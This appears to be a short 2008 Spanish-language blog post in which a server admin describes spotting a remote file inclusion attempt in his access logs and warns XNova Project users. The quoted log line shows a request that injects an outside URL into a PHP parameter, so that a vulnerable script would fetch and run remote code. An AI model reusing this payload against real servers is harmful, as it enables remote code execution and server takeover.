Monday, August 18, 2008, 08:08 AM - /nerd, /openbsd, /www
Como ya es costumbre, diria un Hobbie, cuando llego al trabajo me pongo a ver los logs de
errores,
accesos y seguridad de mi servidor (en el que estan ahora), siempre hay esos intentos boludos de hackeo tratando de entrar como si fuera un IIS o un NT, pero hoy me llamo mucho la atención
las siguientes lineas:
216.139.67.90 - - [17/Aug/2008:02:16:48 -0300] "GET //includes/todofleetcontrol.php?ugamela_root_path=http://www.gugn.ru/news/data/archives/arab.txt?
HTTP/1.1" 404 236 "-" "libwww-perl/5.64"
Me puse a ver que podría ser y encontré el problema en mi amigo
Security Focus, si bien no es nada loco,
llenaron los logs de mierda y ahora tengo que estar vaciándolos.
Asi que ya saben revisen
sus logs si son de los que tienen poco espacio en las particiones o no tienen el rotatelogs en funcionamiento deberian comenzar a vaciar todo (
echo ''>), ahora si usan XNova Project estan en el horno...